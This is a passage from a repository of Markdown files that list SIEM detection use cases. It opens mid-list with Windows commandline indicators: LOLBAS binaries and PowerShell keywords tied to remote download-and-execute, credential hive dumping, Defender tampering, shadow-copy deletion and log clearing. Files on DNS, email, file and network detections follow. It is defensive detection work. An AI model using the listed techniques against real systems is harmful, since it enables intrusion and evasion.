"Add-MpPreference" 214 | - "RemoveDefinitions" 215 | - "DisableIOAVProtection" (T1089) 216 | 217 | - mofcomp.exe 218 | - "-N" AND "\\" (WMI with remote host namespace) 219 | 220 | - msconfig.exe 221 | - "-5" to execute commands inside crafted c:\windows\system32\mscfgtlc.xml (T1218) 222 | 223 | - msdt.exe 224 | - "PCWDiagnostic" to execute arbitrary code (T1202) 225 | 226 | - mshta.exe 227 | - ".hta" AND "c:\users" to execute a .hta file in user space (T1218.005) 228 | - "http" to download a file (T1105) 229 | - "vbscript" to execute vbscript file (T1218.005) 230 | - "javascript" to execute javascript file (T1218.005) 231 | - ":" to interact with an alternate data stream (T1218.005) 232 | 233 | - msiexec.exe 234 | - "/i" OR "/y" AND "http" to download and install remote msi (T1218.007) 235 | - "/i" OR "/y" AND "ftp" to download and install remote msi (T1218.007) 236 | - "/i" OR "/y" AND "c:\users" to install msi (T1218.007) 237 | - "TRANSFORMS=" to leverage a secondary, malicious file (T1218.007) 238 | 239 | - net 240 | - with "localgroup" AND "/add" 241 | - with "user" AND "/add" 242 | 243 | - netsh.exe 244 | - "add helper" to execute a given .dll and gain persistence (T1546.007) 245 | 246 | - netstat 247 | 248 | - ngen.exe 249 | - "http" or "\d+\.\d+\.\d+\.\d+" to download a file (T1105) 250 | 251 | - nltestrk.exe 252 | - "domain_trusts (T1482) 253 | 254 | - odbcconf.exe 255 | - "/A" to Execute DllREgisterServer from DLL specified. (T1218.008) 256 | - "/F" toj Load DLL specified in target .RSP file. (T1218.008) 257 | 258 | - OfflineScannerShell.exe 259 | - "OfflineScannerShell" to execute mpclient.dll library in the current working directory (T1218) 260 | 261 | - pcalua.exe 262 | - "-a" to get this exe to open another command or DLL (T1202) 263 | 264 | - pcwrun.exe 265 | - ".exe" to get this exe to open another command or DLL (T1202) 266 | 267 | - pnputil.exe 268 | - "-i -a" to install drivers (T1547) 269 | 270 | - PowerShell.exe OR powershell_ise.exe 271 | - "-noprofile" OR "-nop" 272 | - "hidden" 273 | - "-noninteractive" OR "-noni" 274 | - "-execution-policy" OR "-ep" 275 | - "bypass" 276 | - "-encodedcommand" OR "-e" OR "-enc" 277 | - "invoke-webrequest" OR "iwr" OR "curl" OR "wget" 278 | - "invoke-restmethod" OR "irm" 279 | - "invoke-expression" OR "iex" 280 | - "invoke-wmimethod" OR "invoke-cimmethod" 281 | - "bitstransfer" 282 | - "downloadstring" 283 | - "downloadfile" 284 | - "winhttprequest" 285 | - "http" 286 | - "ftp" 287 | - "get-ciminstance" OR "gcim" 288 | - "get-wmiobject" OR "gwmi" 289 | - "ToBase64String" 290 | - "FromBase64String" 291 | - "set-wmiinstance" 292 | - "createInstance" 293 | - "nishang" with "Enable-DuplicateToken" 294 | - "nishang" with Get-LsaSecret 295 | - "-stream" to interact with an alternate data stream 296 | 297 | - presentationhost.exe 298 | - "http" to download a remote file (T1105) 299 | 300 | - print.exe 301 | - "/d:" to copy or hide something inside an alternate data stream (T1564.004, T1105) 302 | 303 | - psr.exe 304 | - "/gui 0" to record the user's screen without creating a GUI (T1113) 305 | 306 | - rasautou.exe 307 | - "-d" AND "-p" to load a target DLL and execute an export (T1218) 308 | 309 | - rdrleakdiag.exe 310 | - "/p" to dump a process (T1003) 311 | 312 | - reg.exe 313 | - "add" to add registry objects 314 | - "export" to export registry objects (T1564.004) 315 | - "save" to dump hives (T1003.002) 316 | 317 | - regasm.exe 318 | - ".dll" to load target DLL (T1218.009) 319 | 320 | - regedit.exe 321 | - "/s" to silently import .reg files 322 | - "/e" to export registry objects 323 | 324 | - register-cimprovider.exe 325 | - ".dll" to load a dll (T1218) 326 | 327 | - regsvcs.exe 328 | - ".dll" to load a dll (T1218.009) 329 | 330 | - regsvr32.exe 331 | - "/i" AND "scrobj.dll" to execute a .SCT file with scrobj.dll (T1218.010) 332 | 333 | - rundll32.exe 334 | - "javascript" to execute javascript code (T1218.011) 335 | - ".dll" AND "\users\" to execute a .dll file in userspace (T1218.011) 336 | - ".dll" AND "http" to execute a .dll file from the Internet (T1218.011) 337 | 338 | - runonce.exe 339 | - "/AlternateShellStartup" to execute a Run Once Task preconfigured in registry (T1218) 340 | 341 | - runscripthelper.exe 342 | - "surfacecheck" to execute a PowerShell script with an arbitrary name and extension (T1218) 343 | 344 | - sc.exe 345 | - "create" AND "start" to create and run a service (T1564.004) 346 | - "config" AND "start" to modify and run a service (T1564.004) 347 | 348 | - schtasks.exe 349 | - "create" to creat a new scheduled task (T1053.005) 350 | 351 | - scriptrunner.exe 352 | - "appvscript" to execute a binary (T1202) 353 | 354 | - shadowcopy 355 | - "delete" (T1059, T1490) 356 | 357 | - taskkill.exe 358 | - [with any of your known antivirus/protection executable names] 359 | 360 | 361 | - verclsid.exe 362 | - "/C" to proxy execution of code 363 | 364 | - vssadmin.exe 365 | - "delete" (T1059, T1490) to delete volume shadow copy 366 | - "resize" AND "/maxsize" to neuter volume shadow copy 367 | 368 | - wbadmin.exe 369 | - "delete" (T1059, T1490) 370 | 371 | - wevutil.exe 372 | - "cl" to clear event logs 373 | - "clearn-log" to clear event logs 374 | 375 | - wmic.exe where commandline contains 376 | - "process call create" 377 | - "useraccount list full" 378 | - "group list full" 379 | - "netuse list full" 380 | - "qfe get" 381 | - "startup get" 382 | - "service get" 383 | 384 | 385 | 386 | 387 | ## [Blacklist Alert](https://github.com/TonyPhipps/SIEM/blob/master/Detection-Methods.md#blacklist-alarm) 388 | - Commandline Obfuscation 389 | - Commandline containing 390 | - a caret (^) (T1027) 391 | - /c echo 392 | - two double quotes ("") 393 | - a comma immediately followed by a (,;) 394 | - a semicolon immediately followed by a comma (;,) 395 | - consecutive commas 396 | - consecutive semicolons 397 | - COMSPEC (part of %COMSPEC%) 398 | - /\\ OR \\/ OR \\.\\ OR /./ or\\./ OR .. 399 | - | cmd OR |cmd 400 | - final 401 | 402 | 403 | ## Whitelist Alert 404 | 405 | 406 | ## Levenshtein Score Alert 407 | 408 | 409 | ## Rolling Whitelist Alert 410 | 411 | 412 | 413 | ## Shannon Entropy Score Alert 414 | 415 | 416 | ## Threshold Alert 417 | 418 | 419 | # Log Source Examples 420 | - Windows Security Event ID 4104 (Enable ScriptBlock Logging) 421 | - Windows Security Event ID 4103 (Enable Module Logging) 422 | - Windows PowerShell Transcription Log (File) 423 | - Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription\ 424 | - Create new DWORD EnableInvocationHeader = 1 425 | - Create new DWORD EnableTranscripting = 1 426 | - Create new STRING VALUE OutputDirectory = 427 | - Logs will be stored in .txt files in teh specified directory, using the format `..\YYYYMMDD\PowerShell_transcript.PCNAME.RANDOM.YYYYMMDDHHMMSS.txt`) 428 | - Endpoint Detection AND Response product 429 | 430 | 431 | # Possible False Positives 432 | - Many commandline activities performed by authorized privileged users may false-positive on this content. 433 | 434 | 435 | # References 436 | - https://lolbas-project.github.io/ 437 | - https://github.com/3CORESec/MAL-CL 438 | -------------------------------------------------------------------------------- /Tactics/Configuration-Change.md: -------------------------------------------------------------------------------- 1 | # Configuration Change Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Count of Changes per Source User 8 | - Count of Changes per Source System 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | 15 | ## Whitelist Alert 16 | - Audit Policy Changed by Unexpected User 17 | - Audit Policy Changed at Unexpected Time of Day 18 | - Audit Policy Changed at Unexpected Day of Week 19 | 20 | 21 | ## Levenshtein Score Alert 22 | 23 | 24 | ## Rolling Whitelist Alert 25 | 26 | 27 | ## Shannon Entropy Score Alert 28 | 29 | 30 | ## Threshold Alert 31 | 32 | 33 | # Log Source Examples 34 | 35 | 36 | # Possible False Positives -------------------------------------------------------------------------------- /Tactics/DNS-Request.md: -------------------------------------------------------------------------------- 1 | # DNS Request Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Requests per System 8 | 9 | 10 | ## Blacklist Alert 11 | - Known-Bad Domain Name 12 | - Known-Bad Server IP 13 | - OS Update Requests to External Servers (e.g. Ubuntu update traffic could reveal a rogue system) 14 | - Successful resolution for "WPAD" domain 15 | - Communication with Newly Registered Domain 16 | 17 | 18 | ## Whitelist Alert 19 | - A source system with an unrecognized naming convention is observed 20 | - Requests on domains not in a Top-Million list is observed 21 | 22 | 23 | ## Levenshtein Score Alert 24 | - Typosquatting Company Domains 25 | 26 | 27 | ## Rolling Whitelist Alert 28 | - Newly Observed Domain 29 | - Newly observed Source Process 30 | 31 | 32 | ## Shannon Entropy Score Alert 33 | - High-Entropy Domain Name 34 | - High-Entropy TXT Queries (RCODE:16) 35 | 36 | 37 | ## Threshold Alert 38 | - Requests where type=TXT and TXT field length exceeds X characters (filter by RCODE=16) 39 | - Number of unique domain requests from a single system exceeds X amount in Y time (aggregate on fields: source system, unique_question_count) 40 | - Number of requests with DNS Type TXT from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=16) 41 | - Number of requests with DNS Type NULL from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=10) 42 | - Number of requests with DNS Type CNAME from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=5) 43 | - Number of DNS request volume for multiple sub domains of a single parent domain exceeds x amount in Y time (aggregate on fields: source system) (T1520) 44 | - Parent domain text length exceeds X characters 45 | - Number of responses with code SERVFAIL to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=2) 46 | - Number of responses with code NXDOMAIN to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=3) 47 | - Number of responses with code REFUSED to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=5) 48 | 49 | 50 | ## Deviation from Baseline Alarm 51 | - Deviation in Requests for DNS Type TXT 52 | - Deviation in Requests for DNS Type NULL 53 | - Deviation in Requests for DNS Type CNAME 54 | - Deviation in Response Code NXDOMAIN 55 | - Deviation in Response Code SERVFAIL 56 | - Deviation in Response Code REFUSED 57 | 58 | 59 | # Log Source Examples 60 | - DHCP Server Logs 61 | - Microsoft Sysmon Event ID 22: DNSEvent (DNS query) 62 | 63 | 64 | # Possible False Positives 65 | 66 | 67 | 68 | # References 69 | - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) 70 | - https://docs.microsoft.com/en-us/powershell/module/dnsclient/resolve-dnsname?view=windowsserver2019-ps 71 | - https://www.rsreese.com/parsing-microsoft-dns-server-logs/ 72 | - https://blueteamblog.com/7-ways-to-detect-malicious-dns-traffic-using-siem 73 | -------------------------------------------------------------------------------- /Tactics/Email-Traffic.md: -------------------------------------------------------------------------------- 1 | # Email Traffic Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | - Count of Outbound Emails per Source User/System 9 | - Count of Inbound Emails per Source User/System 10 | - Count of Outbound Emails per Destination User 11 | - Count of Inbound Emails per Destination User 12 | - Count of Unique Destination Users per Source User/System 13 | 14 | 15 | ## Blacklist Alert 16 | - Known-Bad SMTP User Agent 17 | - Inbound Emails Using Internal Email Address as Source or Reply-to 18 | - Email Attachments with Cosecutive Spaces or Extensions (e.g. .docx.exe) 19 | - Outbound Email to Known-Bad Addresses 20 | 21 | 22 | ## Whitelist Alert 23 | 24 | 25 | 26 | ## Levenshtein Score Alert 27 | - Typosquatting Company Domains 28 | 29 | 30 | ## Rolling Whitelist Alert 31 | - Newly Observed SMTP User Agent 32 | - Newly Observed Destination Email Domain 33 | - Newly Observed Source Email Domain 34 | 35 | 36 | ## Shannon Entropy Score Alert 37 | - High Entropy Domain Name Observed 38 | 39 | 40 | ## Threshold Alert 41 | - Source User, Direction=Outbound where Source User Count exceeds threshold 42 | - Source System, Direction=Outbound where Source System Count exceeds threshold 43 | - Source User, Direction=Inbound where Source User Count exceeds threshold 44 | - Source System, Direction=Inbound where Source System Count exceeds threshold 45 | - Destination SMTP Server, Direction=Outbound where Destination SMTP Server Count exceeds threshold 46 | - Subject=Non-Delivery Report where Count exceeds threshold 47 | 48 | 49 | # Log Source Examples 50 | - Email server logs 51 | - Email secure gateway logs 52 | - Endpoint Email client logs 53 | 54 | 55 | # Possible False Positives 56 | -------------------------------------------------------------------------------- /Tactics/File-Access.md: -------------------------------------------------------------------------------- 1 | # File Access Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | - NTDS.dit 7 | 8 | 9 | ## Aggregate Count 10 | - Access of .ost, .pst files (Outlook Email Archives) 11 | 12 | 13 | ## Blacklist Alert 14 | - A business confidential file is accessed 15 | 16 | 17 | ## Whitelist Alert 18 | 19 | 20 | ## Levenshtein Score Alert 21 | 22 | 23 | ## Rolling Whitelist Alert 24 | 25 | 26 | ## Shannon Entropy Score Alert 27 | 28 | 29 | ## Threshold Alert 30 | 31 | 32 | # Log Source Examples 33 | - Windows Security Event ID 4656: A handle to an object was requested 34 | - Host-Based IPS Signatures 35 | - Cloud Bucket Logs 36 | 37 | 38 | # Possible False Positives 39 | -------------------------------------------------------------------------------- /Tactics/File-Content.md: -------------------------------------------------------------------------------- 1 | # File Content Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/File-Creation.md: -------------------------------------------------------------------------------- 1 | # File Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | - New Startup items created at 7 | - %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 8 | - File Created with Known-Malicious Name 9 | - File Created in System Space by Process in User Space 10 | - User creating a .dll file 11 | - Any .mof file creation (WMI Consumer) 12 | 13 | 14 | ## Aggregate Count 15 | - Count of User and Extension 16 | - Count of User and File Path 17 | - Count of Process and File Path 18 | - 10 or more unique .txt file saved within 1 min 19 | 20 | 21 | ## Blacklist Alert 22 | - File Created in System Folders by unexpected accounts (Local System) 23 | - c:\windows\ 24 | - c:\windows\fonts\ 25 | - c:\windows\system32\ 26 | - File Created in User Space by Privileged Account 27 | - File Created that matches known-system executables 28 | - sethc.exe 29 | - utilman.exe 30 | - osk.exe 31 | - narrator.exe 32 | - magnify.exe 33 | - displayswitch.exe 34 | - etc 35 | - Files typically related to ransomware "recovery" 36 | - .txt file with one or more of the following 37 | - Two or more !'s 38 | - name contains "decrypt" 39 | - name contains "recover" 40 | - name contains "restore" 41 | - File name starts with ! 42 | 43 | 44 | ## Whitelist Alert 45 | - File Created with Known-System Name in Unexpected Folder 46 | - Executable File Created in User Space 47 | - A file is created in a non-standard location (e.g. a non-ini/otf/compositefont/ttc/ttf/fon/dat/tmp file created in c:\windows\fonts) 48 | 49 | 50 | ## Levenshtein Score Alert 51 | - Suspicious File Name Closely Matching System File Name 52 | 53 | 54 | ## Rolling Whitelist Alert 55 | - Newly Observed Destination File Extension 56 | - Newly Observed Source Process, Destination File Extension 57 | - Newly Observed Source Process, Destination File Path 58 | - Newly Observed Source User, Destination File Extension 59 | - Newly Observed Source User, Destination File Path 60 | 61 | 62 | ## Shannon Entropy Score Alert 63 | - File Created with High Entropy Score 64 | 65 | 66 | ## Threshold Alert 67 | 68 | 69 | # Log Source Examples 70 | - Microsoft Sysmon Event ID 11: FileCreate 71 | - Windows Security Event ID 4656: A handle to an object was requested 72 | - Host-Based IPS Signatures 73 | - Cloud Bucket Logs 74 | 75 | 76 | # Possible False Positives 77 | -------------------------------------------------------------------------------- /Tactics/File-Deletion.md: -------------------------------------------------------------------------------- 1 | # File Deletion Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/File-Modification.md: -------------------------------------------------------------------------------- 1 | # File Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | 8 | 9 | ## Blacklist Alert 10 | - Changes to hosts file 11 | - Changes by an unexpected user to any file under c:\ root 12 | - Changes by an unexpected user to any file under c:\program files\ 13 | - Changes by an unexpected user to any file under c:\program files (x86)\ 14 | - Changes by an unexpected user to any file under c:\windows\ 15 | - Changes to files in another user's home directory 16 | - Changes to files in folder path containing 'inetpub' or 'wwwroot' 17 | - Changes to c:\windows\system32\drivers\etc\hosts 18 | 19 | ## Whitelist Alert 20 | 21 | 22 | ## Levenshtein Score Alert 23 | 24 | 25 | ## Rolling Whitelist Alert 26 | 27 | 28 | ## Shannon Entropy Score Alert 29 | 30 | 31 | ## Threshold Alert 32 | 33 | 34 | # Log Source Examples 35 | - Cloud Bucket Logs 36 | 37 | 38 | # Possible False Positives 39 | -------------------------------------------------------------------------------- /Tactics/File-Rename.md: -------------------------------------------------------------------------------- 1 | # File Rename Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Access.md: -------------------------------------------------------------------------------- 1 | # Group Access Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Creation.md: -------------------------------------------------------------------------------- 1 | # Group Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Deletion.md: -------------------------------------------------------------------------------- 1 | # Group Deletion Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Modifcation.md: -------------------------------------------------------------------------------- 1 | # Group Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Rename.md: -------------------------------------------------------------------------------- 1 | # Group Rename Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Instance-Creation.md: -------------------------------------------------------------------------------- 1 | # Instance Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Instance-Deletion.md: -------------------------------------------------------------------------------- 1 | # Instance Deletion Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Instance-Modification.md: -------------------------------------------------------------------------------- 1 | # Instance Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Instance-Start.md: -------------------------------------------------------------------------------- 1 | # Instance Start Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Instance-Stop.md: -------------------------------------------------------------------------------- 1 | # Instance Stop Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Log-Clearing.md: -------------------------------------------------------------------------------- 1 | # Log Clearing Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | MITRE ATT&CK Framework: [Indicator Removal on Host (T1070)](https://attack.mitre.org/techniques/T1070/) 6 | 7 | - Clearing event logs is a way for adversaries to clear their tracks. With proper event collection, this should occur seldom, making it a relatively easy detection method. Event logs set to "fill" rather than roll or that allow a large enough rolling file size that it causes system administrators to want to clear the logs should be avoided. 8 | 9 | 10 | ## Aggregate Count 11 | 12 | 13 | ## Blacklist Alert 14 | - Event log cleared 15 | 16 | ## Whitelist Alert 17 | 18 | 19 | ## Levenshtein Score Alert 20 | 21 | 22 | 23 | ## Rolling Whitelist Alert 24 | - Newly Observed Source User 25 | 26 | 27 | ## Shannon Entropy Score Alert 28 | 29 | 30 | ## Threshold Alert 31 | - EventId=1104 where Count exceeds threshold 32 | 33 | 34 | ## LogSource Examples 35 | - Windows Security Event ID 1102: The audit log was cleared 36 | - Windows Security Event ID 1104: The security Log is now full 37 | 38 | 39 | # Possible False Positives 40 | -------------------------------------------------------------------------------- /Tactics/Module-Load.md: -------------------------------------------------------------------------------- 1 | # File Access Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Full paths of loaded modules 8 | 9 | 10 | ## Blacklist Alert 11 | - Loading modules from user space 12 | 13 | 14 | ## Whitelist Alert 15 | - Anomalous load of System.Management.Automation.dll 16 | - Explorer.exe loading unexpected DLLs 17 | 18 | 19 | ## Levenshtein Score Alert 20 | 21 | 22 | ## Rolling Whitelist Alert 23 | 24 | 25 | ## Shannon Entropy Score Alert 26 | 27 | 28 | ## Threshold Alert 29 | 30 | 31 | # Log Source Examples 32 | - Sysmon Event ID 7: Image Loaded 33 | 34 | 35 | # Possible False Positives 36 | -------------------------------------------------------------------------------- /Tactics/NGAV-Alarms.md: -------------------------------------------------------------------------------- 1 | # Next-Generation Antivirus Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Count of Alarms per Source User 8 | - Count of Alarms per Source System 9 | 10 | 11 | ## Blacklist Alert 12 | - Any Server Firing Alarms 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | - Newly Observed Virus Scan Signature 23 | - Newly Observed Virus Scan Signature per System/User 24 | 25 | ## Shannon Entropy Score Alert 26 | 27 | 28 | ## Threshold Alert 29 | 30 | 31 | # Log Source Examples 32 | 33 | 34 | # Possible False Positives -------------------------------------------------------------------------------- /Tactics/Network-Activity-by-Flow.md: -------------------------------------------------------------------------------- 1 | # Network Activity by Flow Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | 8 | 9 | ## Blacklist Alert 10 | - Known-Bad Destination Port Use 11 | 12 | ## Whitelist Alert 13 | - Anomalous Destination Port Use 14 | 15 | ## Levenshtein Score Alert 16 | 17 | 18 | ## Rolling Whitelist Alert 19 | - Newly observed Source System, Protocol 20 | - Newly Observed Source System, HourOfDay 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | - Source System, Destination System, Protocol=UDP where Count exceeds threshold 28 | - Source System, Destination System, Protocol=UDP where Count exceeds threshold 29 | - Source/Destination System, Protocol=TCP where Count exceeds threshold 30 | - Source/Destination System, Protocol=TCP where Count exceeds threshold 31 | - Source/Destination System, Bytes In Total, where Bytes In Total exceeds threshold 32 | - Source/Destination System, Bytes Out Total, where Bytes Out Total exceeds threshold 33 | - Source/Destination System, Bytes In Total, Bytes Out Total, Bytes In/Out Ratio where Bytes In/Out Ratio exceeds threshold 34 | - Source/Destination System, Connection Length where Connection Length exceeds threshold 35 | 36 | 37 | # Log Source Examples 38 | - Netflow Logs 39 | - IPFIX Logs 40 | - SFLOW Logs 41 | - VPC Flow Logs 42 | 43 | 44 | # Possible False Positives 45 | -------------------------------------------------------------------------------- /Tactics/Network-Activity-by-IP.md: -------------------------------------------------------------------------------- 1 | # Network Activity by IP Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | 8 | 9 | ## Blacklist Alert 10 | - Egress Traffic to Known-Bad Port 11 | - ingress Traffic to Known Bad IP 12 | - Egress Traffic to Known Sinkhole IP 13 | - Allowed Ingress Border Traffic on port 3389 (RDP) 14 | - Allowed Ingress Border Traffic on port 6568 (Anydesk) 15 | - Allowed Ingress Border Traffic on port 6129, 6132, or 6133 (Dameware) 16 | - Allowed Ingress Border Traffic on port 5938 (Teamviewer) 17 | - Allowed Ingress Border Traffic on port 5800 or 5900 (VNC) 18 | 19 | 20 | ## Whitelist Alert 21 | - Anomalous Destination Port Use 22 | 23 | ## Levenshtein Score Alert 24 | 25 | 26 | ## Rolling Whitelist Alert 27 | - Newly observed Source System, Protocol 28 | - Newly Observed Source System, HourOfDay 29 | 30 | 31 | ## Shannon Entropy Score Alert 32 | 33 | 34 | ## Threshold Alert 35 | 